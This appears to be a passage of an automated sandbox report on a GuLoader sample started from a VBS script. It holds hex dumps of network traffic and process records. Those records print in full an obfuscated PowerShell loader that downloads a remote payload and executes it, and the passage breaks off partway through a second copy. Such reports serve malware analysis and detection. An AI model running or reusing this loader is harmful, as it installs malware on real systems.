                                                              2024-12-19 06:52:55 UTC507INData Raw: 37 38 63 34 0d 0a 69 87 14 8a 6d e4 9d b3 ff 1f 51 81 e9 67 f8 32 5b 90 30 26 4b fa cb 52 1e 73 b5 21 02 0e bf a8 2c 65 1a 05 d7 26 86 0f 79 29 4c ed 91 7f b9 c5 dc d1 26 8c c0 49 2f 8e d8 ee bb b3 5f d2 ba b8 b2 b4 03 64 7f d1 c3 0c 8a 34 ab e1 0f 4d 60 c9 36 66 54 8c 95 c8 04 95 c7 42 c6 32 cb fa 5d 75 67 0c ef e8 0f 11 ba 95 13 9b eb 5b 92 80 71 ac 55 fd 2a 2a a5 a6 50 5c 99 f0 dc 63 86 b1 f3 c5 2a 9c ce d7 09 ef ac 8f df 45 a2 a0 8d d0 f4 d0 f2 07 70 8c de 6a e4 b6 c7 2a 1d f2 7e 83 4b e9 d5 cb c7 af a6 8a 66 eb 0f 5e 14 1d 06 3b f3 60 f2 4d 04 94 f0 5b c8 e7 bb 90 15 6d 56 5f a0 79 10 61 62 63 61 6f a5 41 83 97 7d d4 10 5a 3d 13 c0 22 49 e7 9e 67 d2 6e 75 90 ea c4 8a 6e 1f c6 a8 ac 33 53 e5 50 cc 54 12 d8 b0 e1 b4 ee a9 86 dd dc 43 1f 94 69 b6 6f 27
                                                              Data Ascii: 78c4imQg2[0&KRs!,e&y)L&I/_d4M`6fTB2]ug[qU**P\c*Epj*~Kf^;`M[mV_yabcaoA}Z="Ignun3SPTCio'
                                                              2024-12-19 06:52:55 UTC1369INData Raw: 57 e9 cc f8 e9 5b 15 a8 a4 dd 0e 8c 82 e9 08 4c 03 77 62 ee a3 57 65 d4 d8 1c 72 b6 0d 86 6a 53 ac 68 2b 22 43 0c da 55 a4 f2 6f 5d 97 5f 2e 4a 8e 19 08 dd 22 65 99 1c d1 49 d1 4b d7 81 ba 56 9f 0b d5 c1 c0 01 7e 89 9d 9e 7b 82 ea 28 95 06 70 d2 18 12 0d fc 15 e6 7f 78 3b 04 77 66 9b f5 7e dc b9 e7 35 05 c6 a9 10 ec 8f 47 ab 81 d7 b2 e2 55 af 74 fa da 74 a7 af 5b 99 54 fb ca c4 7b 21 52 1e 48 81 a6 c4 6a 35 26 c5 a3 b6 d3 79 e3 a7 c5 d1 f2 ce 51 1f 6d ee 5f 7a 89 f0 13 ce 59 18 89 85 45 5c dc 83 06 87 35 c4 5b 3a 03 3e 79 17 23 d9 7a e3 df 9b f8 f2 e4 cf 3b 1e 09 14 a0 7d 08 0f 8c 77 40 aa d0 fa 5a 8f 2a d8 75 be ca 81 88 08 cd 3f 68 ba 10 5f fa ec a0 cb d5 15 80 d8 08 0e 1d c0 00 d4 f5 3d dc 8b 10 06 4d f7 02 e1 43 1d d2 48 f8 57 da 24 e2 b8 51 cd c3 d8
                                                              Data Ascii: W[LwbWerjSh+"CUo]_.J"eIKV~{(px;wf~5GUtt[T{!RHj5&yQm_zYE\5[:>y#z;}w@Z*u?h_=MCHW$Q
                                                              2024-12-19 06:52:55 UTC1369INData Raw: 51 a1 6f 90 9e 29 17 63 f3 d8 14 99 b9 0f b0 20 c5 a9 49 2f 36 a7 ef c6 d7 7a c4 5e cf 5a e0 89 7b 96 ce b3 f6 71 73 cb 9d b8 e8 9f 5a 0f 0d 4f d4 61 51 23 ad e2 d8 96 79 0b fe e0 d2 f2 97 92 a6 d5 aa 18 3a 4f c6 7e ba 38 70 c2 eb 6c 01 34 c0 23 84 32 9d 98 8d 93 7b 3e e7 cd e5 76 e3 df f3 ad 9c a1 cf d3 33 2c 17 e0 24 cb a5 a2 bc 23 9d f4 fa b2 ba f7 92 75 d6 95 8f ca 08 25 66 4d b9 10 f8 3f 86 a0 72 7d 50 c7 d8 e0 13 30 c0 00 bc dc 53 99 cb d6 89 0c 98 6d db 80 a4 7a 35 bf 57 32 62 ee b8 51 99 b0 b6 b0 5b b3 57 4f 2b 5e cb 8d 47 91 fd c7 da e3 05 20 c7 62 d3 b5 32 0f a4 0f bb 97 05 32 11 98 83 87 8b de 42 54 31 78 ec 45 60 d9 3a 61 ca 2d c7 14 1f c9 e8 e7 f1 8b 8f 8f ac 88 4d 60 68 22 7c 21 c4 a0 a3 df 8c 88 99 22 0e 90 b3 62 3c c2 83 f3 99 ca a4 05 33
                                                              Data Ascii: Qo)c I/6z^Z{qsZOaQ#y:O~8pl4#2{>v3,$#u%fM?r}P0Smz5W2bQ[WO+^G b22BT1xE`:a-M`h"|!"b<3
                                                              2024-12-19 06:52:55 UTC1369INData Raw: 34 5a b5 a9 6a 69 fd 1e 0b 37 95 f8 f2 bd 44 eb 93 45 30 a8 95 43 c0 a2 05 6a 53 63 77 16 ab f6 7a 4a b1 ca e1 d6 58 40 3f 4c ae f8 f9 fa ec a0 46 99 31 a8 30 42 08 1d c0 8d 98 91 7d 34 8a 38 74 28 16 21 a6 1b f5 6a 75 f8 57 57 d8 c1 c8 b9 de c5 d8 f5 d6 d7 94 e3 28 5e 92 a6 dd 3b be 80 57 86 25 ac c6 62 6a f0 66 4e a4 e6 cc 30 20 8a 7b 98 3a 2f c6 9f 42 bc 67 d8 c8 95 08 a4 54 cc 35 c0 7c 30 bd 3d ea 63 9b 4a d6 ea e7 ca dd b5 ec 0e 16 01 fc d8 f8 8e 97 27 3a f9 18 c0 9e e4 85 b9 c8 40 c2 65 c2 89 e7 12 62 13 c2 e4 58 e9 40 77 6d 8b 28 34 f6 f2 eb 49 39 47 f2 79 7e c9 d9 e1 d7 7e f8 8c b3 81 e5 3f e0 18 40 12 27 81 b6 c1 8d 8d d1 4a bc 37 34 54 15 3a 50 03 29 62 8b 7f 2b 86 ba e0 7f 76 09 bd 9e 11 c0 f1 43 9f 13 67 2c f9 81 ff 4d 88 08 01 74 9f 2a 59 c1
                                                              Data Ascii: 4Zji7DE0CjScwzJX@?LF10B}48t(!juWW(^;W%bjfN0 {:/BgT5|0=cJ':@ebX@wm(4I9Gy~~?@'J74T:P)b+vCg,Mt*Y
                                                              2024-12-19 06:52:55 UTC1369INData Raw: b2 6b 28 a1 a2 a6 2c 3f be 80 51 da 8a c2 2e 7c 68 18 71 c1 b4 65 0c 40 fb d9 7e 26 6e fa 8a 99 c9 7a 61 19 18 21 81 a9 54 24 ca c5 23 6e 47 00 73 2c 9b 32 62 d2 a3 cf a5 85 a9 0e 7c 4b ac 4d cd 72 5d 3d 39 06 c1 78 31 a3 85 32 4e 7c 70 98 c0 61 32 06 94 ef 41 d9 79 39 eb 26 c4 01 52 b7 b2 eb cd c6 ce b8 5c ab 8a d1 cc d7 5c b0 93 8e a9 0c a1 dd 8d 6f 8c bd ba fe 4f b4 85 0f 3c 36 8c 20 48 2f 9e f4 19 bd 71 25 8b b4 4e 2c 28 65 7b f5 a7 34 1d ff db ee b7 c4 df a9 49 bb a6 ef a5 8b cb 5f b7 96 ff f3 a2 c6 0b 52 a2 3b 57 67 b4 58 ff a4 c1 57 e8 ed 5c 0a 42 16 e4 7d c1 9e 0a 1d 92 2f 56 35 a4 2d b3 3a f2 b4 1b cd 0f 04 ac 39 84 4c 5a fb 83 a7 58 80 5d 56 e9 f7 a8 a0 7a 65 af ad 52 08 53 4b 26 4a ab 16 4d 88 01 49 a1 f3 6d 4d 5b 2e 4d 20 4a bb 14 04 88 8f c0
                                                              Data Ascii: k(,?Q.|hqe@~&nza!T$#nGs,2b|KMr]=9x12N|pa2Ay9&R\\oO<6 H/q%N,(e{4I_R;WgXW\B}/V5-:9LZX]VzeRSK&JMImM[.M J
                                                              2024-12-19 06:52:55 UTC1369INData Raw: 4d 52 e2 5a 03 77 92 fe 79 7d 3d 1a 76 34 6e cc 7a 1a 09 dc 47 37 5c 02 5f 74 20 e4 9a 66 dc e4 bf 14 44 cf 58 04 70 18 4f 96 8c ab 35 67 9e ca 78 8a 62 73 63 6c 7a 8d 1e 2a 3b d1 d1 79 a8 33 69 ec e7 49 50 59 f1 5d f9 1d 5a ff 8e c5 60 4b b7 5c a1 58 f0 26 86 a0 c5 07 98 cb 31 14 da df 94 9b ac ed a9 de e1 96 cd 3e 23 62 5c 0c 86 32 c7 ed e0 b1 87 e2 8e 4e 72 e0 a8 c4 f1 5c 87 db 69 39 a5 7f d0 45 6d c0 66 e3 5e 3d ca e9 6e 58 bb d3 1c 4a 24 85 61 ca 5c 17 fc 61 ea 83 e6 06 a4 73 1c b2 5d d9 60 fa b6 3a 3f 6a 65 51 a7 70 0a 70 a0 7d f4 c7 ca 7e 67 f0 29 53 22 a2 4b 74 3e e4 2c 6d 20 b0 e0 1c 15 2b 9c 9f fb 20 8d 22 ce d5 3a 50 83 a5 06 cd 8b c0 f2 a4 d2 c0 86 df 09 8b d1 c2 97 e5 ff 05 7a 60 cf 52 51 99 8b 43 3b 6e f9 61 de c2 7d 24 5e 9d 86 38 27 93 bd
                                                              Data Ascii: MRZwy}=v4nzG7\_t fDXpO5gxbsclz*;y3iIPY]Z`K\X&1>#b\2Nr\i9Emf^=nXJ$a\as]`:?jeQpp}~g)S"Kt>,m + ":Pz`RQC;na}$^8'
                                                              2024-12-19 06:52:55 UTC1369INData Raw: 52 58 83 b9 43 2c ba e3 35 34 cb 4f 3f 75 a9 65 1e 69 32 5a b8 4f b6 8f 49 8f c9 05 b6 3a 79 25 52 35 e7 b3 05 c4 7b c7 1c 18 9a 23 0c 7a a2 ff 59 f6 51 e7 0b 3c cc 22 b8 b1 57 c0 ee 5e d3 51 2e 13 eb bf a5 a3 e6 d3 5b 82 a5 df b5 bc 86 8b 43 31 6b c0 c0 e1 47 07 71 ab dd a0 13 3b 20 65 d5 8c 9b 30 2f 95 f4 85 07 64 b5 7c 2c a1 31 b0 e0 ba 30 ac 51 87 50 72 65 9c b4 ec 9b 1e 97 fb 3f fc a0 c4 4a ef df fe d6 8f 99 47 69 3d 4d e3 ef 8e ec 00 30 fb db e0 45 8d c2 86 ce 46 76 c2 51 7c f6 00 6d b6 e9 7b 50 0f da cf 22 6b 5e fb d3 35 56 cc fc d2 9a 66 30 74 5c 91 cb 20 f9 b3 f6 48 c7 13 73 27 ec 98 e3 15 17 07 1d 48 fc a3 89 32 3b 17 ee 47 5d c2 1d e7 b9 f6 eb a6 e8 63 49 b1 61 0a eb 53 fc fc b9 b3 39 de 01 f3 90 27 e7 8f 4d 2c 1a 49 43 c8 e9 4b 2d 19 1e d8 b9
                                                              Data Ascii: RXC,54O?uei2ZOI:y%R5{#zYQ<"W^Q.[C1kGq; e0/d|,10QPre?JGi=M0EFvQ|m{P"k^5Vf0t\ Hs'H2;G]cIaS9'M,ICK-
                                                              2024-12-19 06:52:55 UTC1369INData Raw: 18 59 72 e2 1a fb 86 92 ab 35 f9 0f e1 29 23 5e 1c 2b 88 a2 eb ee c0 4a 34 88 e0 1c 9f 72 14 83 fd 20 ee 6d b4 67 cd 35 36 58 3f 77 d4 28 73 ce 29 01 8f 67 46 b4 c6 c3 ee de 14 48 fc 77 dc 52 51 69 b2 73 3b 86 cb 4d 76 c2 51 7c 82 bb 8d fd df 6c 1d 8d 1c 91 60 6f 04 a6 44 ba ba c8 21 69 40 59 9d e4 a8 91 41 57 53 ce 75 50 e2 d0 7c ae e0 3d 11 00 36 a3 67 6f ef 3e 7b cd 4f 5a e0 91 d2 08 9d 5f 67 67 4b 9e 3b fa c7 57 13 85 96 fe ad cf dc f9 b6 1d 8c b6 6c 24 59 7a 76 3b 98 e7 e5 bc 62 78 a4 5d 8d 0c a4 5e b1 f9 73 d4 c9 c7 11 f4 07 3f fb 25 5f 06 21 7e 09 65 73 77 3a 88 6c 7c df e2 b8 2a 11 c7 40 c4 27 6a df b1 e1 27 e6 85 4c 04 17 f1 13 df a5 41 7d 84 88 f7 f7 53 84 e2 64 3e a3 5d 9c f0 4d 1a a6 e1 6f 12 b9 c1 83 26 16 9c 41 69 40 31 9a 2e 49 32 94 ee 25
                                                              Data Ascii: Yr5)#^+J4r mg56X?w(s)gFHwRQis;MvQ|l`oD!i@YAWSuP|=6go>{OZ_ggK;Wl$Yzv;bx]^s?%_!~esw:l|*@'j'LA}Sd>]Mo&Ai@1.I2%
                                                              2024-12-19 06:52:55 UTC1369INData Raw: f8 45 a9 44 ee ce 0f 12 bf bb 02 d4 7f 05 1d 4d 3d 3c e6 4f b6 5c a2 f3 84 53 b6 c1 7c 81 ca 76 67 51 ec b0 02 fc 58 ae 43 7a a6 49 9c 5e 80 a4 60 5f 83 ec a8 75 69 f4 6c 28 b6 04 da f0 9a 49 82 39 6f f5 48 fb 7d 3b 18 33 b8 3e 6d d4 64 15 c8 bf f6 c4 26 ab f8 68 aa 4d af 5d af 3f da 46 f0 7f ad 91 0b 44 5f ec 22 8e cb 93 1b b3 83 3a 34 ba 92 8b c9 16 4b d7 a4 2f e6 25 dc ef 35 74 a4 1e 7e ed c5 91 df 7c b3 e5 37 f1 8c 42 d2 80 64 12 2e f8 a3 5a 62 60 08 44 ca 16 35 0f df 0a 1e 2a 26 2a e9 93 46 f7 c3 f5 f7 98 d4 11 48 74 b9 78 14 38 a1 6b 4e 50 2a 66 b8 d8 f8 03 fa 87 f4 c5 98 15 e5 de 29 23 ac 30 f5 ae f3 e5 14 ee 31 77 49 c8 e5 aa 1a 97 8c 86 be 70 37 64 97 2d af b3 82 8b 49 b1 20 63 2d 60 5f 11 bb a2 7b ca 45 92 91 ca 00 11 1e 20 58 f1 93 5f 66 9d 4a
                                                              Data Ascii: EDM=<O\S|vgQXCzI^`_uil(I9oH};3>md&hM]?FD_":4K/%5t~|7Bd.Zb`D5*&*FHtx8kNP*f)#01wIp7d-I c-`_{E X_fJ
                                                              2024-12-19 06:52:55 UTC1369INData Raw: 77 d0 c9 22 aa 36 a3 4b fd 94 fe 7f 9a a5 86 b9 7a 75 8b 07 b9 28 c0 30 46 5f 20 1a 95 72 00 19 fa b7 2d 2e 6f ef 9b 72 23 f1 13 d1 34 ff 6a 70 03 b9 7a e5 8d e7 8c 42 d2 9d 07 ff c6 d4 4e 26 db e9 5e 1b 80 03 9a dd 66 80 d6 c2 65 12 40 e7 3e 5b f0 33 81 1c 4f 5e 65 a2 42 0c 62 72 51 72 d0 73 2a 1a 9d a5 67 c3 98 bf 4b c5 13 67 4f 14 3c ef 9f ed d3 9d e8 12 eb b7 30 ab 6f 21 91 5c e5 1c 4b 4e b6 76 3f 64 af ed c2 5b 70 c1 ba 4e 54 24 39 31 73 70 1e af a4 66 7a e1 73 32 ff 05 99 8c e6 37 3c f3 e6 a8 ab e1 f0 39 ae 21 b7 6d 54 8c ff c8 6c d2 be 02 c6 b9 05 12 c5 79 67 0c 62 a4 2b 19 e4 7c b0 7e 14 a4 c7 0b 9d 2f b1 05 a9 c6 81 2b 1d 50 cf 18 ea 86 71 4f 99 3a 4e 87 f9 94 05 d0 95 cf ba d9 bb bc a8 05 a1 b8 9b f7 bc e4 27 c9 eb 2c 98 00 3d 79 5d 0b da 79 22
                                                              Data Ascii: w"6Kzu(0F_ r-.or#4jpzBN&^fe@>[3O^eBbrQrs*gKgO<0o!\KNv?d[pNT$91spfzs27<9!mTlygb+|~/+PqO:N',=y]y"


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:01:52:09
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs"
                                                              Imagebase:0x7ff782170000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:01:52:10
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;"
                                                              Imagebase:0x7ff6e3d50000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:01:52:10
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:01:52:20
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba 